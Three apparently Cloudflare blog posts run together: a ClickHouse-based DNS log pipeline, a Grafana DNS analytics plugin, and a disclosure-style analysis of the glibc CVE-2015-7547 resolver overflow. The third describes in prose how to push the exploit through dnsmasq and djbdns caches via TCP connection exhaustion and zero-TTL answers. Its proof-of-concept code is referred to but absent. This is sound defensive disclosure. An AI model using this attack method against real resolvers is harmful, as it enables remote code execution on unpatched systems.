The multiplexer service (known as “log forwarder”) is running on each edge node, assembling log messages from multiple services and transporting them to our warehouse for processing over a TLS secured channel. A counterpart service running in the warehouse receives and demultiplexes the logs into several Apache Kafka clusters. Over the years, Apache Kafka has proven to be an invaluable service for buffering between producers and downstream consumers, preventing data loss when consumers fail over or require maintenance. Since version 0.10, Kafka allows rack-aware allocation of replicas, which improves resilience against rack or site failure, giving us fault tolerant storage of unprocessed messages.

Having a queue with structured logs has allowed us to investigate issues retrospectively without requiring access to production nodes, but it has proven to be quite laborious at times. In the early days of the project we would skim the queue to find offsets for the rough timespan we needed, and then extract the data into HDFS in Parquet format for offline analysis.

About aggregations

The HTTP analytics service was built around stream processors generating aggregations, so we planned to leverage Apache Spark to stream the logs to HDFS automatically. As Parquet doesn’t natively support indexes or arranging the data in a way that avoids full table scans, it’s impractical for on-line analysis or serving reports over an API. There are extensions like parquet-index that create indexes over the data, but not on-the-fly. Given this, the initial plan was to only show aggregated reports to customers, and keep the raw data for internal troubleshooting.

The problem with aggregated summaries is that they only work on columns with low cardinality (a number of unique values). With aggregation, each column in a given time frame explodes to the number of rows equal to the number of unique entries, so it’s viable to aggregate on something like response code which only has 12 possible values, but not a query name for example. Domain names are subject to popularity, so if, for example, a popular domain name gets asked 1,000 times a minute, one could expect to achieve 1000x row reduction for per-minute aggregation, however in practice it is not so.

Due to how DNS caching works, resolvers will answer identical queries from cache without going to the authoritative server for the duration of the TTL. The TTL tends to be longer than a minute. So, while authoritative servers see the same request many times, our data is skewed towards non-cacheable queries such as typos or random prefix subdomain attacks. In practice, we see anywhere between 0 - 60x row reduction when aggregating by query names, so storing aggregations in multiple resolutions almost negates the row reduction. Aggregations are also done with multiple resolution and key combinations, so aggregating on a high cardinality column can even result in more rows than original.

For these reasons we started by only aggregating logs at the zone level, which was useful enough for trends, but too coarse for root cause analysis. For example, in one case we were investigating short bursts of unavailability in one of our data centers. Having unaggregated data allowed us to narrow the issue down to the specific DNS queries experiencing latency spikes, and then correlated the queries with a misconfigured firewall rule. Cases like these would be much harder to investigate with only aggregated data as it only affected a tiny percentage of requests that would be lost in the aggregations.

So we started looking into several OLAP (Online Analytical Processing) systems. The first system we looked into was Druid. We were really impressed with the capabilities and how the front-end (Pivot and formerly Caravel) is able to slice and dice the data, allowing us to generate reports with arbitrary dimensions. Druid has already been deployed in similar environments with over 100B events/day, so we were confident it could work, but after testing on sampled data we couldn’t justify the hardware costs of hundreds of nodes. Around the same time Yandex open-sourced their OLAP system, ClickHouse.

And then it Clicked

ClickHouse has a much simpler system design - all the nodes in a cluster have equal functionality and use only ZooKeeper for coordination. We built a small cluster of several nodes to start kicking the tires, and found the performance to be quite impressive and true to the results advertised in the performance comparisons of analytical DBMS, so we proceeded with building a proof of concept. The first obstacle was a lack of tooling and the small size of the community, so we delved into the ClickHouse design to understand how it works.

ClickHouse doesn’t support ingestion from Kafka directly, as it’s only a database, so we wrote an adapter service in Go. It read Cap’n Proto encoded messages from Kafka, converted them into TSV, and inserted into ClickHouse over the HTTP interface in batches. Later, we rewrote the service to use a Go library using the native ClickHouse interface to boost performance. Since then, we’ve contributed some performance improvements back to the project. One thing we learned during the ingestion performance evaluation is that ClickHouse ingestion performance highly depends on batch size - the number of rows you insert at once. To understand why, we looked further into how ClickHouse stores data.

The most common table engine ClickHouse uses for storage is the MergeTree family. It is conceptually similar to LSM algorithm used in Google’s BigTable or Apache Cassandra, however it avoids an intermediate memory table, and writes directly to disk. This gives it excellent write throughput, as each inserted batch is only sorted by “primary key”, compressed, and written to disk to form a segment. The absence of a memory table or any notion of “freshness” of the data also means that it is append-only and data modification or deletion isn’t supported. The only way to delete data currently is to remove data by calendar months, as segments never overlap a month boundary. The ClickHouse team is actively working on making this configurable. On the other hand, this makes writing and segment merging conflict-free, so the ingestion throughput scales linearly with the number of parallel inserts until the I/O or cores are saturated. This, however, also means it is not fit for tiny batches, which is why we rely on Kafka and inserter services for buffering. ClickHouse then keeps constantly merging segments in the background, so many small parts will be merged and written more times (thus increasing write amplification) and too many unmerged parts will trigger aggressive throttling of insertions until the merging progresses. We have found that several insertions per table per second work best as a tradeoff between real-time ingestion and ingestion performance.

The key to table read performance is indexing and the arrangement of the data on disk. No matter how fast processing is, when the engine needs to scan terabytes of data from disk and use only a fraction of it, it’s going to take time. ClickHouse is a columnar store, so each segment contains a file for each column, with sorted values for each row. This way whole columns not present in the query can be skipped, and then multiple cells can be processed in parallel with vectorized execution. In order to avoid full scans, each segment also has a sparse index file. Given that all columns are sorted by the “primary key”, the index file only contains marks (captured rows) of every Nth row in order to be able to keep it in memory even for very large tables. For example the default settings is to make a mark of every 8,192th row. This way only 122,070 marks are required to sparsely index a table with 1 trillion rows, which easily fits in memory. See primary keys in ClickHouse for a deeper dive into how it works.

When querying the table using primary key columns, the index returns approximate ranges of rows considered. Ideally the ranges should be wide and contiguous. For example, when the typical usage is to generate reports for individual zones, placing the zone on the first position of the primary key will result in rows sorted by zone in each column, making the disk reads for individual zones contiguous, whereas sorting primarily by timestamp would not. The rows can be sorted in only one way, so the primary key must be chosen carefully with the typical query load in mind. In our case, we optimized read queries for individual zones and have a separate table with sampled data for exploratory queries. The lesson learned is that instead of trying to optimize the index for all purposes and splitting the difference, we have made several tables instead.

One such specialisation are tables with aggregations over zones. Queries across all rows are significantly more expensive, as there is no opportunity to exclude data from scanning. This makes it less practical for analysts to compute basic aggregations on long periods of time, so we decided to use materialized views to incrementally compute predefined aggregations, such as counters, uniques, and quantiles. The materialized views leverage the sort phase on batch insertion to do productive work - computing aggregations. So after the newly inserted segment is sorted, it also produces a table with rows representing dimensions, and columns representing aggregation function state. The difference between aggregation state and final result is that we can generate reports using an arbitrary time resolution without actually storing the precomputed data in multiple resolutions. In some cases the state and result can be the same - for example basic counters, where hourly counts can be produced by summing per-minute counts, however it doesn’t make sense to sum unique visitors or latency quantiles. This is when aggregation state is much more useful, as it allows meaningful merging of more complicated states, such as HyperLogLog (HLL) bitmap to produce hourly unique visitors estimate from minutely aggregations. The downside is that storing state can be much more expensive than final values - the aforementioned HLL state tends to be 20-100 bytes / row when compressed, while a counter is only 8 bytes (1 byte compressed on average). These tables are then used to quickly visualise general trends across zones or sites, and also by our API service that uses them opportunistically for simple queries. Having both incrementally aggregated and unaggregated data in the same place allowed us simplify the architecture by deprecating stream processing altogether.

Infrastructure and data integrity

We started with RAID-10 composed of 12 6TB spinning disks on each node, but reevaluated it after the first inevitable disk failures. In the second iteration we migrated to RAID-0, for two reasons. First, it wasn’t possible to hot-swap just the faulty disks, and second the array rebuild took tens of hours which degraded I/O performance. It was significantly faster to replace a faulty node and use internal replication to populate it with data over the network (2x10GbE), than to wait for an array to finish rebuilding. To compensate for higher probability of node failure, we switched to 3-way replication and allocated replicas of each shard to different racks, and started planning for replication to a separate data warehouse.

Another disk failure highlighted a problem with the filesystem we used. Initially we used XFS, but it started to lock up during replication from 2 peers at the same time, thus breaking replication of segments before it completed. This issue has manifested itself with a lot of I/O activity with little disk usage increase as broken parts were deleted, so we gradually migrated to ext4 that didn’t have the same issue.

Visualizing Data

At the time we relied solely on Pandas and ClickHouse’s HTTP interface for ad-hoc analyses, but we wanted to make it more accessible for both analysis and monitoring. Since we knew Caravel - now renamed to Superset - from the experiments with Druid, we started working on an integration with ClickHouse.

Superset is a data visualisation platform designed to be intuitive, and allows analysts to interactively slice and dice the data without writing a single line of SQL. It was initially built and open sourced by AirBnB for Druid, but over time it has gained support for SQL-based backends using SQLAlchemy, an abstraction and ORM for tens of different database dialects. So we wrote and open-sourced a ClickHouse dialect and finally a native Superset integration that has been merged a few days ago.

Superset has served us well for ad-hoc visualisations, but it is still not polished enough for our monitoring use case. At Cloudflare we’re heavy users of Grafana for visualisation of all our metrics, so we wrote and open-sourced a Grafana integration as well.

It has allowed us to seamlessly extend our existing monitoring dashboards with the new analytical data. We liked it so much that we wanted to give the same ability to look at the analytics data to you, our users. So we built a Grafana app to visualise data from Cloudflare DNS Analytics. Finally, we made it available in your Cloudflare dashboard analytics. Over time we’re going to add new data sources, dimensions, and other useful ways how to visualise your data from Cloudflare. Let us know what you’d like to see next.

Does solving these kinds of technical and operational challenges excite you? Cloudflare is always hiring for talented specialists and generalists within our Engineering, Technical Operations and other teams.

Want to see your DNS analytics? We have a Grafana plugin for that

Marek Vavruša — Tue, 14 Feb 2017 18:04:08 GMT

Curious where your DNS traffic is coming from, how much DNS traffic is on your domain, and what records people are querying for that don’t exist? We now have a Grafana plugin for you.

Grafana is an open source data visualization tool that you can use to integrate data from many sources into one cohesive dashboard, and even use it to set up alerts. We’re big Grafana fans here - we use Grafana internally for our ops metrics dashboards.

In the Cloudflare Grafana plugin, you can see the response code breakdown of your DNS traffic. During a random prefix flood, a common type of DNS DDoS attack where an attacker queries random subdomains to bypass DNS caches and overwhelm the origin nameservers, you will see the number of NXDOMAIN responses increase dramatically. It is also common during normal traffic to have a small amount of negative answers due to typos or clients searching for missing records.

You can also see the breakdown of queries by data center and by query type to understand where your traffic is coming from and what your domains are being queried for. This is very useful to identify localized issues, and to see how your traffic is spread globally.

You can filter by specific data centers, record types, query types, response codes, and query name, so you can filter down to see analytics for just the MX records that are returning errors in one of the data centers, or understand whether the negative answers are generated because of a DNS attack, or misconfigured records.

Once you have the Cloudflare Grafana Plugin installed, you can also make your own charts using the Cloudflare data set in Grafana, and integrate them into your existing dashboards.

Virtual DNS customers can also take advantage of the Grafana plugin. There is a custom Grafana dashboard that comes installed with the plugin to show traffic distribution and RTT from different Virtual DNS origins, as well as the top queries that uncached or are returning SERVFAIL.

The Grafana plugin is just one step to install once you have Grafana up and running:

Once you sign in using your user email and API key, the plugin will automatically discover domains and Virtual DNS clusters you have access to.

The Grafana plugin is built on our new DNS analytics API. If you want to explore your DNS traffic but Grafana isn’t your tool of choice, our DNS analytics API is very easy to get started with. Here’s a curl to get you started:

To make all of this work, Cloudflare DNS is answering and logging millions of queries each second. Having high resolution data at this scale enables us to quickly pinpoint and resolve problems, and we’re excited to share this with you. More on this in a follow up deep dive blog post on improvements in our new data pipeline.

Instructions for how to get started with Grafana are here and DNS analytics API documentation is here. Enjoy!

This blog post was edited on 9/20/18 to update installation instructions.

A tale of a DNS exploit: CVE-2015-7547

Marek Vavruša — Mon, 29 Feb 2016 13:42:19 GMT

This post was written by Marek Vavruša and Jaime Cochran, who found out they were both independently working on the same glibc vulnerability attack vectors at 3am last Tuesday.

A buffer overflow error in GNU libc DNS stub resolver code was announced last week as CVE-2015-7547. While it doesn't have any nickname yet (last year's Ghost was more catchy), it is potentially disastrous as it affects any platform with recent GNU libc—CPEs, load balancers, servers and personal computers alike. The big question is: how exploitable is it in the real world?

It turns out that the only mitigation that works is patching. Please patch your systems now, then come back and read this blog post to understand why attempting to mitigate this attack by limiting DNS response sizes does not work.

But first, patch!

On-Path Attacker

Let's start with the PoC from Google, it uses the first attack vector described in the vulnerability announcement. First, a 2048-byte UDP response forces buffer allocation, then a failure response forces a retry, and finally the last two answers smash the stack.

This proof of concept requires attacker talking with glibc stub resolver code either directly or through a simple forwarder. This situation happens when your DNS traffic is intercepted or when you’re using an untrusted network.

One of the suggested mitigations in the announcement was to limit UDP response size to 2048 bytes, 1024 in case of TCP. Limiting UDP is, with all due respect, completely ineffective and only forces legitimate queries to retry over TCP. Limiting TCP answers is a plain protocol violation that cripples legitimate answers:

Regardless, let's see if response size clipping is effective at all. When calculating size limits, we have to take IP4 headers into account (20 octets), and also the UDP header overhead (8 octets), leading to a maximum allowed datagram size of 2076 octets. DNS/TCP may arrive fragmented—for the sake of argument, let's drop DNS/TCP altogether.

Looks like we've mitigated the first attack method, albeit with collateral damage. But what about the UDP-only proof of concept?

While it's not possible to ship a whole attack payload in 2048 UDP response size, it still leads to memory corruption. When the announcement suggested blocking DNS UDP responses larger than 2048 bytes as a viable mitigation, it confused a lot of people, including other DNS vendors and ourselves. This, and the following proof of concept show that it's not only futile, but harmful in long term if these rules are left enabled.

So far, the presented attacks required a MitM scenario, where the attacker talks to a glibc resolver directly. A "good enough" mitigation is to run a local caching resolver, to isolate glibc code from the attacker. In fact, doing so not only improves the Internet performance with a local cache, but also prevents past and possibly future security vulnerabilities.

Is a caching stub resolver really good enough?

Unfortunately, no. A local stub resolver such as dnsmasq alone is not sufficient to defuse this attack. It's easy to traverse, as it doesn't scrub upstream answers—let's see if the attack goes through with a modified proof of concept that uses only well-formed answers and zero time-to-live (TTL) for cache traversal.

The big question is—now that we've seen that the mitigation strategies for MitM attacks are provably ineffective, can we exploit the flaw off-path through a caching DNS resolver?

An off-path attack scenario

Let's start with the first phase of the attack—a compliant resolver is never going to give out a response larger than 512 bytes over UDP to a client that doesn't support EDNS0. Since the glibc resolver doesn't do that by default, we have to escalate to TCP and perform the whole attack there. Also, the client should have at least two nameservers, otherwise it complicates a successful attack.

Let's try it with a proof of concept that merges both the DNS proxy and the attacker.

The DNS proxy on localhost is going to ask the attacker both queries over UDP, and the attacker responds with a TC flag to force client to retry over TCP.
The attacker responds once with a TCP response of 2049 bytes or longer, then forces the proxy to close the TCP connection to glibc resolver code. This is a critical step with no reliable way to achieve that.
The attacker sends back a full attack payload, which the proxy happily forwards to the glibc resolver client.

Performing the attack over a real resolver

The key factor to a real world non-MitM cache resolver attack is to control the messages between the resolver and the client indirectly. We came to the conclusion that djbdns’ dnscache was the best target for attempting to illustrate an actual cache traversal.

In order to fend off DoS attack vectors like slowloris, which makes numerous simultaneous TCP connections and holds them open to clog up a service, DNS resolvers have a finite pool of parallel TCP connections. This is usually achieved by limiting these parallel TCP connections and closing the oldest or least-recently active one. For example—djbdns (dnscache) holds up to 20 parallel TCP connections, then starts dropping them, starting from the oldest one. Knowing this, we realised that we were able to terminate TCP connections with ease. Thus, one security fix becomes another bug’s treasure.

In order to exploit this, the attacker can send a truncated UDP A+AAAA query, which triggers the necessary retry over TCP. The attacker responds with a valid answer with a TTL of 0 and dnscache sends the glibc client a truncated UDP response. At this point, the glibc function send_vc() retries with dnscache over TCP and since the previous answer's TTL was 0, dnscache asks the attacker’s server for the A+AAAA query again. The attacker responds to the A query with an answer larger than 2000 to induce glibc's buffer mismanagement, and dnscache then forwards it to the client. Now the attacker can either wait out the AAAA query while other clients are making perfectly legitimate requests or instead make 20 TCP connections back to dnscache, until dnscache terminates the attacker's connection.

Now that we’ve met all the conditions to trigger another retry, the attacker sends back any valid A response and a valid, oversized AAAA that carries the payload (either in CNAME or AAAA RDATA), dnscache tosses this back to the client, triggering the overflow.

It seems like a complicated process, but it really is not. Let’s have a look at our proof-of-concept:

Client:

This PoC was made to simply illustrate that it’s not only probable, but possible that a remote code execution via DNS resolver cache traversal can and may be happening. So, patch. Now.

We reached out to OpenDNS, knowing they had used djbdns as part of their codebase. They investigated and verified this particular attack does not affect their resolvers.

How accidental defenses saved the day

Dan Kaminsky wrote a thoughtful blog post about scoping this issue. He argues:

I’m just going to state outright: Nobody has gotten this glibc flaw to workthrough caches yet. So we just don’t know if that’s possible. Actualexploit chains are subject to what I call the MacGyver effect.

Current resolvers scrub and sanitize final answers, so the attack payload must be encoded in a well-formed DNS answer to survive a pass through the resolver. In addition, only some record types are safely left intact—as the attack payload is carried in AAAA query, only AAAA records in the answer section are safe from being scrubbed, thus forcing the attacker to encode the payload in these. One way to circumvent this limitation is to use a CNAME record, where the attack payload may be encoded in a CNAME target (maximum of 255 octets).

The only good mitigation is to run a DNS resolver on localhost where the attacker can't introduce resource exhaustion, or at least enforce minimum cache TTL to defuse the waiting game attack.

Takeaway

You might think it's unlikely that you could become a MitM target, but the fact is that you already are. If you ever used a public Wi-Fi in an airport, hotel or maybe in a café, you may have noticed being redirected to a captcha portal for authentication purposes. This is a temporary DNS hijacking redirecting you to an internal portal until you agree with the terms and conditions. What's even worse is a permanent DNS interception that you don't notice until you look at the actual answers. This happens on a daily basis and takes only a single name lookup to trigger the flaw.

Neither DNSSEC nor independent public resolvers prevent it, as the attack happens between stub and the recursor on the last mile. The recent flaws highlight the fragility of not only legacy glibc code, but also stubs in general. DNS is deceptively complicated protocol and should be treated carefully. A generally good mitigation is to shield yourself with a local caching DNS resolver¹, or at least a DNSCrypt tunnel. Arguably, there might be a vulnerability in the resolver as well, but it is contained to the daemon itself—not to everything using the C library (e.g., sudo).

Are you affected?

If you're running GNU libc between 2.9 and 2.22 then yes. Below is an informative list of several major platforms affected.

Platform

Notice

Status

Debian

CVE-2015-7547

Patched packages available (squeeze and newer)

Ubuntu

USN-2900-1

Patched packages available (14.04 and newer)

RHEL

KB2161461

Patched packages available (RHEL 6-7)

SUSE

SUSE-SU-2016:0472-1

Patched packages available (latest)

Network devices & CPEs

Updated list of affected platforms

The toughest problem with this issue is the long tail of custom CPEs and IoT devices, which can't be really enumerated. Consult the manufacturer's website for vulnerability disclosure. Keep in mind that if your CPE is affected by remote code execution, its network cannot be treated as safe anymore.

If you're running OS X, iOS, Android or any BSD flavour², you're not affected.

[1] Take a look at Unbound, PowerDNS Recursor or Knot DNS Resolver for a compliant validating resolver.
[2] Applications running under Linux emulation and using glibc may be affected, make sure to update ports.